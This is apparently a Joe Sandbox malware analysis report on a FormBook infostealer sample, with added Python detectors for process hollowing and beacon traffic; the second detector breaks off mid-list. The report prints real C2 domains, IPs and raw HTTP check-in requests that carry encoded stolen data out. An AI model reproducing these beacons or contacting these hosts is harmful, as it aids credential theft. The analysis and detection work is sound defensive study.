
Windows Analysis Report
wWXR5js3k2.exe

Overview

General Information

Sample name: wWXR5js3k2.exe (renamed because the original name is a hash value)
Original sample name: 919e47baabe9cc5fe28aa098991efc624b4cfe2c4008ce036a35b49edc438a4d.exe
Analysis ID: 1587987
MD5: 9d8150f9b27a2a93925717d361add951
SHA1: 92f4860eda8a22e43fc777b64c590891280d6a80
SHA256: 919e47baabe9cc5fe28aa098991efc624b4cfe2c4008ce036a35b49edc438a4d
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wWXR5js3k2.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\wWXR5js3k2.exe" MD5: 9D8150F9B27A2A93925717D361ADD951)
    • svchost.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\wWXR5js3k2.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ycBMGRFRlht.exe (PID: 3688 cmdline: "C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • powercfg.exe (PID: 7604 cmdline: "C:\Windows\SysWOW64\powercfg.exe" MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
          • ycBMGRFRlht.exe (PID: 6568 cmdline: "C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7840 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches on memory dumps (5 of 8 entries shown; Source | Rule | Description | Author):
00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Yara matches on unpacked PE files (Source | Rule | Description | Author):
2.2.svchost.exe.2600000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.2600000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\wWXR5js3k2.exe", CommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", ParentImage: C:\Users\user\Desktop\wWXR5js3k2.exe, ParentProcessId: 7260, ParentProcessName: wWXR5js3k2.exe, ProcessCommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", ProcessId: 7316, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\wWXR5js3k2.exe", CommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", ParentImage: C:\Users\user\Desktop\wWXR5js3k2.exe, ParentProcessId: 7260, ParentProcessName: wWXR5js3k2.exe, ProcessCommandLine: "C:\Users\user\Desktop\wWXR5js3k2.exe", ProcessId: 7316, ProcessName: svchost.exe
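Both Sigma hits above fire on one event: svchost.exe (PID 7316) created by the dropper and carrying the dropper's own command line, which is what a process started suspended and then hollowed looks like from the outside. The following Python is an added example, not part of the Joe Sandbox report or of the Sigma rule, that expresses that logic over constructed process-creation events built from the process tree shown earlier in this report. The allow-list of normal svchost.exe parents is an assumption for the example, abbreviated rather than the rule's own list.

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str                 # full path of the new process image
    command_line: str          # command line the new process was started with
    parent_pid: int
    parent_image: str
    parent_command_line: str


# Parents that legitimately start svchost.exe. Assumed, abbreviated allow-list for
# this example; the published Sigma rule carries its own vetted list.
NORMAL_SVCHOST_PARENTS = {
    "services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe",
    "svchost.exe", "ngen.exe", "tiworker.exe",
}


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def executable_from_command_line(command_line: str) -> str:
    """Return the program token of a Windows command line (quoted or bare)."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def analyse(event: ProcessEvent) -> list:
    """Return the anomaly names that apply to one process-creation event."""
    findings = []
    # Rule 1: svchost.exe started by something other than its usual parents.
    if (image_name(event.image) == "svchost.exe"
            and image_name(event.parent_image) not in NORMAL_SVCHOST_PARENTS):
        findings.append("uncommon_svchost_parent")
    # Rule 2: the command line names a different executable than the mapped image.
    # A hollowed process keeps the command line it was created with, so the image
    # on disk and the command line disagree.
    if image_name(executable_from_command_line(event.command_line)) != image_name(event.image):
        findings.append("command_line_image_mismatch")
    # Rule 3: the child was created with exactly its parent's command line.
    if event.command_line.strip() == event.parent_command_line.strip():
        findings.append("inherited_parent_command_line")
    return findings


def scan(events) -> dict:
    """Map PID -> findings for every event that triggered at least one rule."""
    return {e.pid: f for e in events if (f := analyse(e))}


# Constructed from the process tree in this report (PIDs, paths and command lines as shown there).
DROPPER_CMD = r'"C:\Users\user\Desktop\wWXR5js3k2.exe"'
HOLLOWED_SVCHOST = ProcessEvent(
    pid=7316, image=r"C:\Windows\SysWOW64\svchost.exe", command_line=DROPPER_CMD,
    parent_pid=7260, parent_image=r"C:\Users\user\Desktop\wWXR5js3k2.exe",
    parent_command_line=DROPPER_CMD)
STAGER_DIR = r"C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW"
INJECTED_POWERCFG = ProcessEvent(
    pid=7604, image=r"C:\Windows\SysWOW64\powercfg.exe",
    command_line=r'"C:\Windows\SysWOW64\powercfg.exe"',
    parent_pid=3688, parent_image=STAGER_DIR + r"\ycBMGRFRlht.exe",
    parent_command_line='"' + STAGER_DIR + r'\ycBMGRFRlht.exe"')
# Constructed benign baseline (not from the report): a service host started by the SCM.
BENIGN_SVCHOST = ProcessEvent(
    pid=1234, image=r"C:\Windows\System32\svchost.exe",
    command_line=r"C:\Windows\System32\svchost.exe -k netsvcs -p",
    parent_pid=700, parent_image=r"C:\Windows\System32\services.exe",
    parent_command_line=r"C:\Windows\system32\services.exe")

if __name__ == "__main__":
    for pid, findings in scan([HOLLOWED_SVCHOST, BENIGN_SVCHOST, INJECTED_POWERCFG]).items():
        print(pid, ", ".join(findings))
```

With the three events above only PID 7316 is reported. The powercfg.exe hop passes all three checks: it is started with its own correct command line and it is not a service host, which is why the report has to rely on memory signatures for that stage (Writes to foreign memory regions, Queues an APC in another process) rather than on the shape of the process tree.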
Suricata alerts (all SID 2855464, severity 1, classtype "A Network Trojan was detected", protocol TCP):

Timestamp                        Source IP    Src Port  Destination IP   Dst Port
2025-01-10T20:11:07.355810+0100  192.168.2.9  64515     43.205.198.29    80
2025-01-10T20:11:09.893739+0100  192.168.2.9  64516     43.205.198.29    80
2025-01-10T20:11:12.451878+0100  192.168.2.9  64517     43.205.198.29    80
2025-01-10T20:11:20.710172+0100  192.168.2.9  64519     188.114.97.3     80
2025-01-10T20:11:23.244704+0100  192.168.2.9  64520     188.114.97.3     80
2025-01-10T20:11:25.845738+0100  192.168.2.9  64521     188.114.97.3     80
2025-01-10T20:11:34.312650+0100  192.168.2.9  64523     194.245.148.189  80
2025-01-10T20:11:37.285209+0100  192.168.2.9  64524     194.245.148.189  80
2025-01-10T20:11:39.490086+0100  192.168.2.9  64525     194.245.148.189  80
2025-01-10T20:11:47.779010+0100  192.168.2.9  64527     63.250.43.134    80
2025-01-10T20:11:51.267833+0100  192.168.2.9  64528     63.250.43.134    80


                AV Detection

Source: wWXR5js3k2.exe, Virustotal: Detection: 64%
Source: wWXR5js3k2.exe, ReversingLabs: Detection: 73%
Source: Yara match, File source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2610818121.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2615837301.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1886979901.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: wWXR5js3k2.exe, Joe Sandbox ML: detected
Source: wWXR5js3k2.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: powercfg.pdbGCTL source: svchost.exe, 00000002.00000003.1852599121.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1852713638.0000000002A2D000.00000004.00000020.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2612973441.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ycBMGRFRlht.exe, 00000004.00000000.1809965971.000000000041E000.00000002.00000001.01000000.00000005.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1957819340.000000000041E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: wWXR5js3k2.exe, 00000000.00000003.1371523327.00000000036F0000.00000004.00001000.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1370169862.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793017531.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795048850.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1888818959.0000000003100000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.000000000344E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1886495587.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: wWXR5js3k2.exe, 00000000.00000003.1371523327.00000000036F0000.00000004.00001000.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1370169862.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1793017531.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1886544115.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795048850.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, powercfg.exe, 00000005.00000003.1888818959.0000000003100000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2613793846.000000000344E000.00000040.00001000.00020000.00000000.sdmp, powercfg.exe, 00000005.00000003.1886495587.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: powercfg.exe, 00000005.00000002.2611913316.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.00000000038DC000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1958596191.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185627863.000000003B45C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: powercfg.exe, 00000005.00000002.2611913316.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, powercfg.exe, 00000005.00000002.2614313409.00000000038DC000.00000004.10000000.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000000.1958596191.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2185627863.000000003B45C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: powercfg.pdb source: svchost.exe, 00000002.00000003.1852599121.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1852713638.0000000002A2D000.00000004.00000020.00020000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2612973441.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\wWXR5js3k2.exe, Code function: 0_2_006B445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe, Code function: 0_2_006BC6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe, Code function: 0_2_006BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\wWXR5js3k2.exe, Code function: 0_2_006BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe, Code function: 0_2_006BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe, Code function: 0_2_006BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe, Code function: 0_2_006B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe, Code function: 0_2_006B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\wWXR5js3k2.exe, Code function: 0_2_006BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\powercfg.exe, Code function: 5_2_02A7C9B0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\powercfg.exe, Code function: 5_2_02A69F20 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\powercfg.exe, Code function: 5_2_02A6E620 4x nop then pop edi
Source: C:\Windows\SysWOW64\powercfg.exe, Code function: 5_2_02A6E5FC 4x nop then pop edi
Source: C:\Windows\SysWOW64\powercfg.exe, Code function: 5_2_031004DE 4x nop then mov ebx, 00000004h

                Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64525 -> 194.245.148.189:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64524 -> 194.245.148.189:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64523 -> 194.245.148.189:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64528 -> 63.250.43.134:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64515 -> 43.205.198.29:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64527 -> 63.250.43.134:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64516 -> 43.205.198.29:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64520 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64519 -> 188.114.97.3:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64517 -> 43.205.198.29:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:64521 -> 188.114.97.3:80
Source: DNS query: www.oneeyetrousersnake.xyz
Source: global traffic, TCP traffic: 192.168.2.9:64437 -> 162.159.36.2:53
Source: Joe Sandbox View, IP Address: 188.114.97.3 (2 entries)
Source: Joe Sandbox View, IP Address: 43.205.198.29
Source: Joe Sandbox View, ASN Name: CSLDE
Source: unknown, TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 entries)
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 entries)
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006C22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_006C22EE
Source: global traffic, HTTP traffic detected:
  GET /mz0w/?rdmhfXe=uMzU0JGK22aEYJLCyAIreKcU1rJUCkGv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wwp4pfrJHMjCh6luBqHWNFeR0cmEvsKw==&AF=At8pGDY0Z HTTP/1.1
  Host: www.qqa79.top
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Source: global traffic, HTTP traffic detected:
  GET /6pwo/?rdmhfXe=OcYLCa3XOMtt+Rsv8j1JEBYyKSs2FBnaDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abiRcuJlWrvFsYiciiVw8Ks4AYAtrm9w==&AF=At8pGDY0Z HTTP/1.1
  Host: www.1secondlending.one
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Source: global traffic, HTTP traffic detected:
  GET /rk61/?rdmhfXe=4Jev6jkxg6xEO7DVmJ20iETfs2t7f6dacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9IEZesAjm/l1NEB+do2leeTcUFeI7Uw==&AF=At8pGDY0Z HTTP/1.1
  Host: www.supernutra01.online
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Source: global traffic, HTTP traffic detected:
  GET /hakt/?rdmhfXe=Z3UZ9pkvUTN8eySircCOaDAcK9AA6JZfB0YdpGFssPaitvOOGMcOB1EIrUeEo9sxw4W4nK9e2r79OuzvY2TkP9tUb4eHWat+jQL942ZrdRgvNUE9NQ==&AF=At8pGDY0Z HTTP/1.1
  Host: www.wine-drinkers.club
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic, DNS traffic detected: DNS query: www.qqa79.top
Source: global traffic, DNS traffic detected: DNS query: www.1secondlending.one
Source: global traffic, DNS traffic detected: DNS query: www.supernutra01.online
Source: global traffic, DNS traffic detected: DNS query: www.wine-drinkers.club
Source: global traffic, DNS traffic detected: DNS query: www.oneeyetrousersnake.xyz
Source: unknown, HTTP traffic detected:
  POST /6pwo/ HTTP/1.1
  Host: www.1secondlending.one
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: en-us
  Accept-Encoding: gzip, deflate, br
  Content-Length: 196
  Cache-Control: max-age=0
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Origin: http://www.1secondlending.one
  Referer: http://www.1secondlending.one/6pwo/
  User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
  Body (decoded from the hex dump): rdmhfXe=DewrBs2mT9lmqS0h8xo/FhwWGBpKZWTNPx5ns21VAUkobXqqdZEHSQNzlyFMh7ik9/OdrHAaMkApARbeuUnOj2o0bErQsAMAu92UJAkmv7cJP8LjujybVvacQulyg8c06pYoAu37enjigoPEZ8chlIeWCMkeUSXytXbjCrL8lVpsnGR6Rgi0nH0Fx5xQ
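The four GET requests and the POST above share one User-Agent, a four-character path, the same query-parameter name (rdmhfXe) and the same trailing token (AF=At8pGDY0Z) across four unrelated domains; only the base64-like blob changes. The Python below is an added example, not part of the report, that parses raw HTTP requests, scores each one on those traits and then correlates blob-carrying requests across hosts by parameter name. The sample requests are reconstructed from the ones shown in this report plus one constructed benign request; the blob-length threshold and the path shape are assumptions for the example.

```python
import re
from collections import defaultdict

# User-Agent sent with every request in this report (identical across all hosts).
OBSERVED_UA = ("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36")
SHORT_PATH = re.compile(r"/[a-z0-9]{4}/")        # /mz0w/, /6pwo/, /rk61/, /hakt/
BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")     # base64-looking payload; 40 is an assumed floor
SHORT_TOKEN = re.compile(r"[A-Za-z0-9]{1,12}")     # AF=At8pGDY0Z style trailing token


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.1 request into method, path, query pairs, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    # Query and body are split by hand: urllib's parse_qsl would turn '+' into a
    # space and mangle the base64-like values we want to inspect.
    pairs = [(k, v) for k, _, v in (p.partition("=") for p in query.split("&") if p)]
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": pairs, "headers": headers, "body": body}


def score_request(req: dict) -> list:
    """Name the beacon traits present in one parsed request."""
    reasons, h = [], req["headers"]
    if h.get("user-agent") == OBSERVED_UA:
        reasons.append("observed_user_agent")
    if SHORT_PATH.fullmatch(req["path"]):
        reasons.append("short_random_path")
    if req["method"] == "GET":
        q = req["query"]
        if len(q) == 2 and BLOB.fullmatch(q[0][1]) and SHORT_TOKEN.fullmatch(q[1][1]):
            reasons.append("get_blob_plus_short_token")
    elif req["method"] == "POST":
        body_pairs = [p.partition("=") for p in req["body"].split("&") if p]
        same_page = h.get("referer") == f"http://{h.get('host', '')}{req['path']}"
        if (h.get("content-type") == "application/x-www-form-urlencoded" and same_page
                and len(body_pairs) == 1 and BLOB.fullmatch(body_pairs[0][2])):
            reasons.append("post_blob_to_own_referer")
    return reasons


def beacon_key(req: dict) -> str:
    """Parameter name carrying the blob: first query key (GET) or first body key (POST)."""
    return req["query"][0][0] if req["method"] == "GET" else req["body"].partition("=")[0]


def correlate(raw_requests) -> dict:
    """Score every request, then link blob-carrying requests that reuse a parameter name across hosts."""
    per_request, hosts_by_param = [], defaultdict(set)
    for raw in raw_requests:
        req = parse_request(raw)
        reasons = score_request(req)
        host = req["headers"].get("host", "")
        per_request.append((host, req["method"], reasons))
        if "get_blob_plus_short_token" in reasons or "post_blob_to_own_referer" in reasons:
            hosts_by_param[beacon_key(req)].add(host)
    rotating = {name: sorted(hosts) for name, hosts in hosts_by_param.items() if len(hosts) >= 3}
    return {"requests": per_request, "rotating_hosts": rotating}


def _request(method, target, host, ua=OBSERVED_UA, extra_headers=(), body=""):
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}",
             "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
             "Accept-Language: en-us", "Connection: close", f"User-Agent: {ua}", *extra_headers]
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Sample traffic: the four GET beacons and the POST reconstructed from this report,
# plus one constructed benign request (www.example.com) that must not score.
SAMPLE_REQUESTS = [
    _request("GET", "/mz0w/?rdmhfXe=uMzU0JGK22aEYJLCyAIreKcU1rJUCkGv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wwp4pfrJHMjCh6luBqHWNFeR0cmEvsKw==&AF=At8pGDY0Z", "www.qqa79.top"),
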